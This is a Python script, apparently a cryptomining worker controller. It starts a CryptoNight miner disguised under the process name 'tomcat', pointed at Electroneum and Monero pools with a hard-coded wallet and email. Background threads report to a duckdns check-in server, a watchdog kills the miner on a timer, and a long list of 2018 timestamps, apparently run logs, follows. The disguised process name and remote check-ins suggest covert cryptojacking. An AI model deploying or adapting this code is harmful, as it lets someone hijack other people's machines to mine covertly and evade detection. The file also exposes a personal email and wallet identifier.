import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:20:05.811739
#2018-02-17 16:57:06.048085
#2018-02-17 18:33:03.481135
#2018-02-17 20:08:05.043018
#2018-02-17 21:40:01.586073
#2018-02-17 23:10:01.975948
#2018-02-18 00:47:01.709756
#2018-02-18 02:23:07.251854
#2018-02-18 03:54:01.796331
#2018-02-18 05:27:01.422221
#2018-02-18 07:05:07.956686
#2018-02-18 08:36:05.610041
#2018-02-18 10:10:08.907038
#2018-02-18 11:42:03.556815
#2018-02-18 13:14:05.668534
#2018-02-18 14:48:01.496282
#2018-02-18 16:24:04.670723
#2018-02-18 17:55:08.135850
#2018-02-18 19:28:03.778271
#2018-02-18 20:59:05.132393
#2018-02-18 22:29:06.738538
#2018-02-19 00:08:07.739710
#2018-02-19 01:38:03.608859
#2018-02-19 03:13:07.638426
#2018-02-19 04:44:07.280512
#2018-02-19 06:15:08.438553
#2018-02-19 07:52:01.614332
#2018-02-19 09:26:04.863864
#2018-02-19 10:59:04.377464
#2018-02-19 12:29:07.279585
#2018-02-19 14:01:07.326165
#2018-02-19 15:38:06.594847
#2018-02-19 17:12:06.790213
#2018-02-19 18:45:12.362284
#2018-02-19 20:16:07.370407
#2018-02-19 21:53:03.805557
#2018-02-19 23:23:01.585908
#2018-02-20 00:57:01.887943
#2018-02-20 02:36:04.319963
#2018-02-20 04:12:04.884903
#2018-02-20 05:40:07.279014
#2018-02-20 07:13:03.937274
#2018-02-20 08:47:06.809903
#2018-02-20 10:19:03.555041
#2018-02-20 11:53:01.370677
#2018-02-20 13:29:08.721221
#2018-02-20 15:02:08.153385
#2018-02-20 16:37:01.722286
#2018-02-20 18:12:04.126629
#2018-02-20 19:51:01.403377
#2018-02-20 21:22:02.176399
#2018-02-20 22:54:05.629289
#2018-02-21 00:23:03.806527
#2018-02-21 02:01:07.762589
#2018-02-21 03:38:02.047904
#2018-02-21 05:11:06.308853
#2018-02-21 06:46:04.241208
#2018-02-21 08:16:05.576062
#2018-02-21 09:49:07.406631
#2018-02-21 11:25:01.280502
#2018-02-21 12:57:11.584404
#2018-02-21 14:31:08.890564
#2018-02-21 16:03:08.804579
#2018-02-21 17:41:07.903494
#2018-02-21 19:10:09.970426
#2018-02-21 20:34:01.322749
#2018-02-21 22:19:04.449066
#2018-02-21 23:52:04.662232
#2018-02-22 01:27:06.454008
#2018-02-22 03:02:04.375913
#2018-02-22 04:31:06.403428
#2018-02-22 06:04:01.538414
#2018-02-22 07:37:02.129137
#2018-02-22 09:12:05.706848
#2018-02-22 10:45:04.835247
#2018-02-22 12:16:01.866561
#2018-02-22 13:48:04.192211
#2018-02-22 15:26:06.730128
#2018-02-22 16:55:07.844561
#2018-02-22 18:31:05.441433
#2018-02-22 20:09:06.044820
#2018-02-22 21:41:02.212685
#2018-02-22 23:11:05.854153
#2018-02-23 00:44:07.299386
#2018-02-23 02:18:07.059845
#2018-02-23 03:54:04.814926
#2018-02-23 05:35:06.582737
#2018-02-23 07:20:06.715272
#2018-02-23 09:24:06.894957
#2018-02-23 11:29:06.449561
#2018-02-23 13:20:06.440151
#2018-02-23 15:06:09.410971
#2018-02-23 16:54:08.074933
#2018-02-23 18:44:01.800325
#2018-02-23 20:31:07.395915
#2018-02-23 22:18:04.239317
#2018-02-24 00:05:06.758141
#2018-02-24 02:01:07.685655
#2018-02-24 03:51:07.039850
#2018-02-24 05:35:05.434952
#2018-02-24 07:21:01.608489
#2018-02-24 09:11:07.188784
#2018-02-24 11:06:05.432331
#2018-02-24 12:54:04.710146
#2018-02-24 14:42:03.642162
#2018-02-24 16:33:01.387497
#2018-02-24 18:23:05.957900
#2018-02-24 20:10:06.140618
#2018-02-24 21:54:02.215403
#2018-02-25 00:55:02.783073
#2018-02-25 04:45:08.509250
#2018-02-25 08:57:01.912065